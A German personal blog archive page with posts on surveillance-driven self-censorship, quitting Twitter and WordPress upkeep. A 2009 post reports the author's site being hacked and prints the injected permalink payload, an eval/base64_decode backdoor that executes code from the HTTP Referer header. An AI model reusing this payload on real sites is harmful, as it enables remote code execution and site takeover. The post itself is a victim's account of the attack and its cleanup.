2013 19. Okt

Das habe ich mich in den letzten Wochen und Monaten häufiger gefragt, ohne eine abschließende Antowort darauf zu finden – das Leben geht schließlich weiter und ich denke ja nicht 24/7 an NSA, GCHQ und Konsorten.

Die erschreckende Antwort habe ich mir eben selbst gegeben – um einen Facebook-Post abzuschicken, habe ich mehr als 30 Sek. gezögert…und dann tatsächlich nochmal umformuliert. Damit mir nicht sowas oder sowas passiert (wofür es aufgrund meiner Äußerungen natürlich schon zu spät sein könnte). Soviel auch zum Thema „brauchen wir unbedingt um Terrorismus und Kinderpornografie zu bekämpfen“.

Facebook-Post

Einer der Gründe, aus denen das Bundesverfassungsgericht die Vorratsdatenspeicherung seinerzeit für rechtswidrig erklärte, war derjenige, dass das Wissen der Bürger um eine umfängliche Überwachung dazu führen könnte, dass Meinungen im Internet nicht mehr oder nur noch „systemkonform“ geäußert werden. Rein rational konnte man das schon damals nachvollziehen, aber ich fand es in dem Moment vorhin heftig, als ich es das erste Mal bewusst gefühlt habe.

Freiheit fühlt sich irgendwie anders an.

Und jetzt bitte keine Diskussion a la „selber schuld wenn man bei Facebook was postet…“ Das ist ja genau der Grund, warum so etwas nicht sein darf. Es kann nicht sein, dass wir auf unsere Meinungsäußerung verzichten, weil wir befürchten müssen, dass wir überwacht werden. Wenn die das schaffen, haben sie gewonnen.

Ich meine das genau so, wie ich es schreibe: Die Situation, dass man besucht oder abgeholt wird, weil man sich unerwünscht geäußert oder verhalten hat, die hatten wir hierzulande vor leider nicht allzu langer Zeit. Dabei war noch nicht einmal das Besuchen oder Abholen selbst das Instrument, sondern die daraus resultierende Angst der Allgemeinheit. Und mittlerweile muss man befürchten, dass so etwas eben doch wieder passiert. Demokratisch legitimiert und unter dem Beifall der Masse.

Ja, es kommt aus Star Wars, aber es passt hervorragend:

So geht die Freiheit zugrunde – unter donnerndem Applaus.

So, und jetzt wird erstmal an irgendeine seriöse Organisation gespendet, die sich für Bürgerrechte und im Speziellen gegen die VDS engagieren. Vorschläge?

2011 09. Jul

Irgendwann kommt der Zeitpunkt, an dem man sich eingestehen muss, dass etwas die eigenen Erwartungen nicht erfüllt hat. Und dann Konsequenzen zieht, denn sonst unterhält man irgendwann einen Rattenschwanz irrelevanter Peripherie, von der trotzdem noch jedes Stückchen etwas Zeit und Energie fordert.

Twitter ist ein Klassiker für sowas. Ich bin ein medienbegeisterter Mensch mit einem Hang zum Konservatisvismus in dem Bereich, sprich: das Tempo neuer Entwicklungen da ist mir viel zu hoch. Spiegelt sich auch in den abwerwitzigen Bewertungen dieser Unternehmen. Facebook 100 Mrd. USD? Lächerlich. Twitter 6 Mrd. USD? Schon eher, aber immer noch irre. Gut, vielleicht muss in dem Sektor die Innovation so schnell gehen und dann eben die 98,5%  sinnbefreiten Geschäftsmodelle den Bach runtergehen.

Persönlicher Mehrwert? Null.

Weiterlesen »

2010 28. Nov

Es ist mal wieder soweit: irgendwie bin ich des Blogs etwas überdrüssig, was auch daran liegen mag, dass ich in den nächsten Wochen und Monaten erstmal ein bisschen an meiner Dissertation schrauben sollte. Also ist erstmal selbstverordnete Zwangspause bis mindestens Ende Januar. Danach sehen wir weiter.

Euch bis dahin viel Spaß, ruhige Weihnachten und einen guten Rutsch.

Danke für’s Lesen und bis denne…

Ähnliche Beiträge

2010 07. Feb

Hätte mir ja auch mal vorher jemand sagen können, dem Admin fällt sowas ja nicht auf 🙂 Beim Eingeben des Captchas zum Kommentieren wurde auch bei richtiger Eingabe die Meldung „Invalid Code“ ausgegeben und ein neuer Code wurde generiert. Endlos-Schleife.

Ich habe das Plugin vorerst deaktiviert in der Hoffnung, dass Akismet Spam-Kommentare solange zuverlässig abfängt.

2009 05. Sep

Traurig aber wahr: es hat den Anschein, dass mein kleines Blog am Mittwoch um 2:16 Uhr morgens Opfer einer Attacke wurde. Es begann mit der Registrierung eines Benutzers namens „MikeWink“. Danach hatten alle Links im Blog ein Anhängsel in der Form

http://www.example.com/posttitle/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/

Der Browser reagiert für jeden Klick auf jeden beliebigen Link mit „Internal Server Error 500“. Man konnte im Blog also nicht mehr navigieren (jeder Link war wie oben beschrieben manipuliert), sondern nur noch die Startseite aufrufen. Bemerkt habe ich den Zustand Donnerstag nachmittag und direkt behoben, indem ich „einfach“ im Admin Panel die Permalink-Struktur wieder zurückgesetzt habe auf meinen Standard (dort war der o.g. Code einfach hinzugefügt worden, wie auch immer das geht.

Die Attacke nutzte wohl eine Schwäche in der WordPress-Version 2.7.1, die ich deswegen noch nicht geupdated hatte, weil von Problemen mit dem 2.8.x-Strang berichtet wurde. Lesenswerte Details finden sich beim Fiesen Admin.

MIttlerweile habe ich das Problem oberflächlich behoben, meint: neue Passwörter für Datenbank, FTP, Admin-Bereich. Allerdings scheint der Hack tiefer in die Datenbank zu reichen und hier -Asche auf mein Haupt- ist das letzte Backup von April diesen Jahres, weil still und unbemerkt das Backup-Plugin nach dem Update auf 2.7.1 aufgehört hat, wöchentlich Mail mit einem Backup im Anhang zu schicken. Und da diese Mails automatisch wegsortiert und als „gelesen“ marktiert werden… (Update: Lucky Bastard! Sie wurden von da an nur auf einen Ordner auf dem Server gespeichert, statt sie zu verschicken :D)

Es ist doch zum ko**** mit diesen scheiß Hackern bzw. hier eher SkriptKiddies, warum können die nicht einfach irgendwo hingehen und sterben?

Update – Was nicht hilft…

Interessant. Das hat in meinem Blog funktioniert, obwohl die Benutzerregistrierung schon vorher deaktiviert war…

Update 2 – Tracking it down + Gegenmaßnahmen

Weiterlesen »

2008 11. Apr

Bevor sich die geneigte Leserschaft noch sorgt: ich war lediglich auf einen Kurztrip weg. Es schlummern schon wieder 10+ Posts in der Queue, aber es wird noch ein paar Tage dauern, bis die ersten davon publikationsreif sind.

Bis dahin als kleine Entschädigung drei „Ratebilder“. Und, wo war ich? 😀

Weiterlesen »

Ähnliche Beiträge

2008 09. Feb

Ja, ihr habt richtig gesehen, nach langer Zeit habe ich mich dazu durchringen können, das ganze Blog mal wieder grundlegend zu updaten. Und da ich keine Lust auf die Nummer „Kopie der Datenbank und der Dateien > Lokaler Server > Änderungen > Zurückspielen auf den Server > Feststellen, dass nix mehr geht“ hatte, müssen meine armen Leser als Beta-Tester herhalten.

Jetzt läuft WordPress auf Version 2.33 und das neue Theme ist das iTheme. Finde ich schick und passt zum Blog.

Also: wenn irgendwas nicht geht, insbesondere in der Benutzung, dann bitte meckern, hier in den Kommentaren oder via Kontakt-Funktion. Danke für Hinweise schonmal vorab!

Ich habe über zwei Jahre an dem alten Theme gebastelt, gemacht und getan, da ist bei diesem Update sicher einiges im Argen und leider bin ich kein Profi, nichtmal ein Semi-Profi, so dass jeder kleine Mist mühseliges Code-Gefrickel für mich bedeutet… es wird also dauern, aber irgendwann wird alles gut 🙂

Ähnliche Beiträge

Seiten: 1 2 3 4 Ältere
  • Artikel
  • Twitter
  • Tumblr